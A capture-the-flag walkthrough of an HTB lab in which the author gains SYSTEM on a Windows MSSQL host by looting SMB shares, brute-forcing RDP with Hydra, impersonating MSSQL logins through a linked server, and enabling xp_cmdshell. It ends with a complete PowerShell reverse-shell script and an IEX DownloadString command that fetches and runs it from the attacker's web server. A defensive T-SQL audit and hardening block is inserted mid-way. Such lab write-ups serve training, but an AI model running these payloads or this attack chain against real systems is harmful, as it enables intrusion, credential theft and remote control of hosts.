Attacking Common Services - Hard
Hints:
1- Utilize default credentials on a service to access files containing passwords and relevant information.
2- Conduct a brute-force attack on a service using the compromised files.
3- Gain access to a service using the obtained credentials.
4- Escalate privileges to admin (refer to the attacking databases section for details).
When scanning all ports I initially used rustscan because of its speed, but it is not always accurate, so it's essential to run Nmap afterwards to confirm whether any additional ports are open.
rustscan -a 10.129.150.169 -r 1-65535 --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.150.169:135
Open 10.129.150.169:445
Open 10.129.150.169:3389
Then I used smbclient to list the shares on the host:
smbclient -L 10.129.203.10
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Home Disk
IPC$ IPC Remote IPC
Let's check whether we can access the "Home" share:
smbclient \\\\10.129.203.10\\Home
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Apr 21 17:18:21 2022
.. D 0 Thu Apr 21 17:18:21 2022
HR D 0 Thu Apr 21 16:04:39 2022
IT D 0 Thu Apr 21 16:11:44 2022
OPS D 0 Thu Apr 21 16:05:10 2022
Projects D 0 Thu Apr 21 16:04:48 2022
7706623 blocks of size 4096. 3168564 blocks available
smb: \> dir .\IT\
. D 0 Thu Apr 21 16:11:44 2022
.. D 0 Thu Apr 21 16:11:44 2022
Fiona D 0 Thu Apr 21 16:11:53 2022
John D 0 Thu Apr 21 17:15:09 2022
Simon D 0 Thu Apr 21 17:16:07 2022
Each directory contains files with user credentials, so download them with get <filename>. Of particular interest is the 'secrets.txt' file in John's directory, which suggests that this user is running a linked server. Let's use Fiona's credentials file to attempt brute-forcing RDP access:
hydra -l fiona -P ./creds.txt 10.129.150.169 rdp -vV
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-04 10:24:50
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 5 login tries (l:1/p:5), ~2 tries per task
[DATA] attacking rdp://10.129.150.169:3389/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 10.129.150.169 - login "fiona" - pass "kAkd03SA@#!" - 1 of 5 [child 0] (0/0)
[ATTEMPT] target 10.129.150.169 - login "fiona" - pass "48Ns72!bns74@S84NNNSl" - 2 of 5 [child 1] (0/0)
[ATTEMPT] target 10.129.150.169 - login "fiona" - pass "SecurePassword!" - 3 of 5 [child 2] (0/0)
[ATTEMPT] target 10.129.150.169 - login "fiona" - pass "Password123!" - 4 of 5 [child 3] (0/0)
[ATTEMPT] target 10.129.150.169 - login "fiona" - pass "SecureLocationforPasswordsd123!!" - 5 of 5 [child 0] (0/0)
[STATUS] attack finished for 10.129.150.169 (waiting for children to complete tests)
[3389][rdp] host: 10.129.150.169 login: fiona password: 48Ns72!bns74@S84NNNSl
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-04 10:25:15
I obtained the password, and now I will use it to connect over RDP with rdesktop:
rdesktop -u fiona -p '48Ns72!bns74@S84NNNSl' 10.129.150.169
Autoselecting keyboard map 'en-us' from locale
ATTENTION! The server uses and invalid security certificate which can not be trusted for
the following identified reasons(s);
1. Certificate issuer is not trusted by this system.
Issuer: CN=WIN-HARD
Review the following certificate info before you trust it to be added as an exception.
If you do not trust the certificate the connection atempt will be aborted:
Subject: CN=WIN-HARD
Issuer: CN=WIN-HARD
Valid From: Wed Apr 3 10:17:21 2024
To: Thu Oct 3 10:17:21 2024
Certificate fingerprints:
sha1: 9f8432611764165e07c32c43f758bc5f567adf46
sha256: c4971520cd885eda3796f17cb97817102a5dc883e162bb78427166df8437da76
Do you trust this certificate (yes/no)? yes
Failed to initialize NLA, do you have correct Kerberos TGT initialized ?
Once on the box, the first thing I did was check the local users. The users 'Simon' and 'John' do not exist on this machine, so there is no point brute-forcing RDP again with their credentials files. I also noted the ports listening locally, which I included in the next Nmap scan. I ran Nmap against all of these ports:
nmap -p135,445,1433,3389,5985,47001,49664,49665,49666,49667,49668,49669,49670,49697,139 10.129.150.169 -A -Pn -vvv
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-04 10:51 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:51
Completed NSE at 10:51, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:51
Completed NSE at 10:51, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:51
Completed NSE at 10:51, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 10:51
Completed Parallel DNS resolution of 1 host. at 10:51, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 10:51
Scanning 10.129.150.169 [15 ports]
Discovered open port 135/tcp on 10.129.150.169
Discovered open port 3389/tcp on 10.129.150.169
Discovered open port 445/tcp on 10.129.150.169
Discovered open port 1433/tcp on 10.129.150.169
Completed Connect Scan at 10:51, 7.64s elapsed (15 total ports)
Initiating Service scan at 10:51
Scanning 4 services on 10.129.150.169
Completed Service scan at 10:53, 126.22s elapsed (4 services on 1 host)
NSE: Script scanning 10.129.150.169.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:53
NSE Timing: About 99.82% done; ETC: 10:54 (0:00:00 remaining)
Completed NSE at 10:54, 40.20s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:54
Completed NSE at 10:54, 12.11s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
Nmap scan report for 10.129.150.169
Host is up, received user-set (0.98s latency).
Scanned at 2024-04-04 10:51:39 EDT for 186s
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp filtered netbios-ssn no-response
445/tcp open microsoft-ds? syn-ack
1433/tcp open ms-sql-s syn-ack Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.129.150.169:1433:
| Target_Name: WIN-HARD
| NetBIOS_Domain_Name: WIN-HARD
| NetBIOS_Computer_Name: WIN-HARD
| DNS_Domain_Name: WIN-HARD
| DNS_Computer_Name: WIN-HARD
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-04-04T14:17:32
| Not valid after: 2054-04-04T14:17:32
| MD5: 97db:24b3:bd14:d8e0:0bab:f5dd:ba17:6b6e
| SHA-1: b43a:4ea5:3775:1a8c:979a:da67:5d8a:2d1b:b687:92fb
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQK1waeJ1O/4tGkfOjMEg4KDANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjQwNDA0MTQxNzMyWhgPMjA1NDA0MDQxNDE3MzJaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAL+C2myT
| ru+3oLBFF9C/+p1KH6/Dt0DbKI7mxBpkxKBgXT2Il8Z/qXysfWVEFzJL0ZAe0iwc
| q3pJTx1dIdF174hRifrBT/g2Dyc7f0FXH150qyoH6zzp3qpc6XQUntMyVGL8+WGC
| 6FRU3o09be+Z+TqMXCt9o4SPXqm24NRggU/VMYvPD3cJVQSS8UJJikRIAcXYXYoo
| oOqm9vYPPXk05Fgwd0IECgKcFldS1sbaYVSmfiLdzxwPQ1SA7iXheLguB0HN6/KC
| Ygs1LN+1S14eGsLtPHIPK34y2KEVWVMS6jHlny3876Z41Lg34wuIKQzmTSzGZE4q
| 8SDuQxvjGAKWbWECAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAVF/WsilzsaYAIG7+
| Xq8Ppl+qwQdl9slRc1LCOC9hN8ePRO2CEd8eJC4L3QkiYRtANiwU8NaANCO4hIgM
| QxUogemcyDp1TNUvVuEolBsjBfUDih9jwmesNjQYLzcJxHTX5kvjkzRe9+7sJ83L
| gi7xN0SjhnlhurGVNsjT9fqwAUr8ZWL72XrLSUsvWZmvFvOlMKJcihH38bjlFCO/
| Dllx8/+B/7HWsWne85w8rIsbuTzNmA2fWfA5siK4dJI5T3WQzI2k04/GQPE0Nxvz
| 6pXpDmjXNgdXvrpNuY2j1ML+vphjJ53UwDv8jsSpY0yqBVCzOVCAv3UuUi1ZFmAj
| a6oemQ==
|_-----END CERTIFICATE-----
|_ssl-date: 2024-04-04T14:55:06+00:00; +27s from scanner time.
| ms-sql-info:
| 10.129.150.169:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-HARD
| Issuer: commonName=WIN-HARD
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-04-03T14:17:21
| Not valid after: 2024-10-03T14:17:21
| MD5: 7c0d:b069:8f2d:d1d9:f999:59a4:5f9b:3721
| SHA-1: 9f84:3261:1764:165e:07c3:2c43:f758:bc5f:567a:df46
| -----BEGIN CERTIFICATE-----
| MIIC1DCCAbygAwIBAgIQeRnDxYvznJlPbDoFOcll5zANBgkqhkiG9w0BAQsFADAT
| MREwDwYDVQQDEwhXSU4tSEFSRDAeFw0yNDA0MDMxNDE3MjFaFw0yNDEwMDMxNDE3
| MjFaMBMxETAPBgNVBAMTCFdJTi1IQVJEMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A
| MIIBCgKCAQEAukZe/+uTs+3QpLDa8h/NczxGPZwgoGeTIS90uNDTv9+s2oNU8TBr
| ugxMkVz0MAPVmiLe9K8MaroF3E8uB4uZ30Td4T4ZUXESw+32WWnRv1++MPiN9pqu
| PA2kMV6Ps1b8iYIEf591YgJGf/B6pjgnRa2GF9b8ndEmR5k+Lb2rP73KHRD/Q+D4
| vWgZUMc6GP9NwtjrBQA+H6UBZVPjo0limgxzrn5DEZz49zMG6xdcY6gngQ0ChhGy
| ht2CfD3fEZpJXIdWLswh20pFoOKZoQS7E46XsXsms/pE1mxNQpF9qlZs2vQjDQE6
| gOTJjCg/dDGbdFfarX9eYZvyR4Sn1pIogQIDAQABoyQwIjATBgNVHSUEDDAKBggr
| BgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQELBQADggEBAH/ehuZc/n5G
| HTqhULmAFoPTI9gGAR97yCLW9WMGERe9fXddv8FFsBmNopSW/8bL56TnkrJ7Bm5D
| K9Npgc7KXMQhNAcRUytPVpsZzVjLOMZO1GK5o5XrKYmdkvT7CELu5RszWDFXLVnO
| uPWJajPJldXmUxQm/3KnDjIe8127gdgKjkseu+8NPy5DPu9F1RzVoU3YpULhpxFo
| lHyEWgtpryjKwQ3B6wtC4EBXrOU2P7r7uqhXvBQ0SfjOyauJ7ceAxVD6vOBXeJyF
| MuBvUymzm57G1vyGIpa9ak4LaMsIv/0FSLW0dO94jlT16zY5oPrNBrCPf27zzGk9
| XcMzLaIROC0=
|_-----END CERTIFICATE-----
|_ssl-date: 2024-04-04T14:55:03+00:00; +27s from scanner time.
5985/tcp filtered wsman no-response
47001/tcp filtered winrm no-response
49664/tcp filtered unknown no-response
49665/tcp filtered unknown no-response
49666/tcp filtered unknown no-response
49667/tcp filtered unknown no-response
49668/tcp filtered unknown no-response
49669/tcp filtered unknown no-response
49670/tcp filtered unknown no-response
49697/tcp filtered unknown no-response
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-04-04T14:54:31
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: 26s, deviation: 0s, median: 26s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 64644/tcp): CLEAN (Timeout)
| Check 2 (port 16127/tcp): CLEAN (Timeout)
| Check 3 (port 9132/udp): CLEAN (Timeout)
| Check 4 (port 26116/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 186.62 seconds
As we can see, an MSSQL port is open, so let's use Fiona's credentials to connect to it:
sqsh -S 10.129.203.10 -U '.\\fiona' -P '48Ns72!bns74@S84NNNSl' -h
sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty
1>
It worked. Can we use the other users' credentials to brute-force MSSQL? I attempted to brute-force the other users with Medusa:
medusa -h 192.168.1.128 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M mssql
That did not work, so let's return to our MSSQL session. If you recall, we found a file named 'information.txt' under John's directory that mentioned 'create a local linked server'. Let's check whether there are any linked servers:
1> SELECT srvname, isremote FROM sysservers
2> go
WINSRV02\SQLEXPRESS 1
LOCAL.TEST.LINKED.SRV 0
So 'LOCAL.TEST.LINKED.SRV' is a linked server. Before trying to run a query on it remotely, and given the 'impersonation' mentioned in that file, let's check which logins we can impersonate:
1> SELECT distinct b.name
2> FROM sys.server_permissions a
3> INNER JOIN sys.server_principals b
4> ON a.grantor_principal_id = b.principal_id
5> WHERE a.permission_name = 'IMPERSONATE'
6> go
john
simon
Impersonating the john login:
1> EXECUTE AS LOGIN = 'john'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> go
john
0
It worked. Now let's verify if John is a sysadmin on that linked server.
1> select * from openquery("LOCAL.TEST.LINKED.SRV", 'SELECT is_srvrolemember(''sysadmin'')')
2> go
1
It returned '1', indicating that John has the 'sysadmin' role on the linked server. Now let's execute SQL queries on that linked server:
1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [LOCAL.TEST.LINKED.SRV]
2> go
WINSRV02\SQLEXPRESS
Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
testadmin
1
Now I executed "whoami" through "xp_cmdshell":
1> EXECUTE('xp_cmdshell ''whoami''') AT [LOCAL.TEST.LINKED.SRV];
2> go
Msg 15281, Level 16, State 1
Server 'WIN-HARD\SQLEXPRESS', Procedure 'xp_cmdshell', Line 1
SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell'
by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
So we first need to enable "xp_cmdshell" on the linked server before we can use it; then we run whoami again:
1> EXECUTE('
2> EXEC sp_configure ''show advanced options'', 1;
3> RECONFIGURE;
4> EXEC sp_configure ''xp_cmdshell'', 1;
5> RECONFIGURE;
6> EXEC xp_cmdshell ''whoami''
7> ') AT [LOCAL.TEST.LINKED.SRV];
8> go
Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
nt authority\system
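From the defender's side, the chain above rests on three configuration facts: logins that hold IMPERSONATE on other logins, a linked server with RPC out enabled whose login mapping lands on a sysadmin (testadmin), and xp_cmdshell being switchable on. The following T-SQL is an added audit and hardening example, not part of the original writeup or the HTB module; it is meant to be run by a DBA with sysadmin rights. The login names fiona and john are taken from the writeup as assumptions (the page never states who holds the IMPERSONATE grant), and the remote login name and password at the end are placeholders.

```sql
-- Added audit/hardening example; not part of the original writeup.
-- Sections 1-2 and 4a-4b run on the instance that defines the linked server
-- (WIN-HARD in the writeup); sections 3 and 4c run on the instance behind
-- LOCAL.TEST.LINKED.SRV, where xp_cmdshell was switched on.

-- 1. Who can EXECUTE AS whom?  For server-level IMPERSONATE the login being
--    impersonated is identified by major_id (class SERVER_PRINCIPAL), so this
--    lists grantee -> target explicitly instead of relying on the grantor.
SELECT grantee.name AS grantee_login,
       target.name  AS impersonatable_login,
       p.state_desc
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals AS target  ON target.principal_id  = p.major_id
WHERE p.class_desc = 'SERVER_PRINCIPAL'
  AND p.permission_name = 'IMPERSONATE';

-- 2. Linked servers that allow EXECUTE ... AT (rpc out) and how logins are
--    mapped onto them.  local_principal_id = 0 is the catch-all mapping for
--    every login not listed individually; a fixed remote_name that is
--    sysadmin on the remote side hands that role to anyone who can reach
--    the linked server.
SELECT s.name                                  AS linked_server,
       s.data_source,
       s.is_rpc_out_enabled,
       s.is_data_access_enabled,
       ISNULL(lp.name, '<all other logins>')   AS local_login,
       ll.uses_self_credential,
       ll.remote_name
FROM sys.servers AS s
LEFT JOIN sys.linked_logins      AS ll ON ll.server_id    = s.server_id
LEFT JOIN sys.server_principals  AS lp ON lp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1;

-- 3. Is xp_cmdshell on?  value_in_use = 1 means RECONFIGURE already ran.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 4a. Remove the impersonation grant (assumption: fiona held IMPERSONATE on
--     john, which is what the writeup's result set implies).
REVOKE IMPERSONATE ON LOGIN::[john] FROM [fiona];

-- 4b. Stop remote procedure execution through the link; data access
--     (OPENQUERY) can stay on if reporting still needs it.  Then map the
--     link to a dedicated low-privilege remote login instead of a sysadmin
--     (remote login name and password are placeholders).
EXEC sp_serveroption @server   = N'LOCAL.TEST.LINKED.SRV',
                     @optname  = N'rpc out',
                     @optvalue = N'false';

EXEC sp_addlinkedsrvlogin @rmtsrvname  = N'LOCAL.TEST.LINKED.SRV',
                          @useself     = N'false',
                          @locallogin  = NULL,
                          @rmtuser     = N'linked_reader_PLACEHOLDER',
                          @rmtpassword = N'CHANGE_ME_PLACEHOLDER';

-- 4c. On the remote instance: switch xp_cmdshell back off and re-hide
--     advanced options (the reverse of the sequence the writeup ran).
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

Query 2 is the one to watch over time: a link with is_rpc_out_enabled = 1 and a catch-all mapping to a privileged remote_name is exactly what turned a low-privilege MSSQL login into nt authority\system here. For detection, the "Configuration option 'xp_cmdshell' changed from 0 to 1" lines the writeup shows are also written to the SQL Server error log, so alerting on that string (or auditing sp_configure with SQL Server Audit) catches this step even when the session itself is not logged.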
So we can execute OS commands. You could use loadfile() to read the flag, but in our case we will get a shell instead, so let's generate one with PowerShell and save it as "shell.ps1":
$client = New-Object System.Net.Sockets.TCPClient('10.10.16.165',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
I placed it in the directory from which we will run our Python web server:
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.203.10 - - [05/Apr/2024 06:54:11] "GET /shell.ps1 HTTP/1.1" 200 -
10.129.203.10 - - [05/Apr/2024 06:55:52] "GET /shell.ps1 HTTP/1.1" 200 -
Then I started Netcat listening on the port the PowerShell reverse shell connects back to:
nc -lnvp 4444
Finally, I executed the command that downloads the PowerShell reverse shell and runs it directly in memory:
1> EXECUTE('xp_cmdshell ''echo IEX (New-Object Net.WebClient).DownloadString("http://10.10.16.165/shell.ps1") | powershell -noprofile''') AT [LOCAL.TEST.LINKED.SRV];
2> go
After this, a shell from that machine comes back on the Netcat listener.
I hope you enjoyed the process! Here are some references for further information: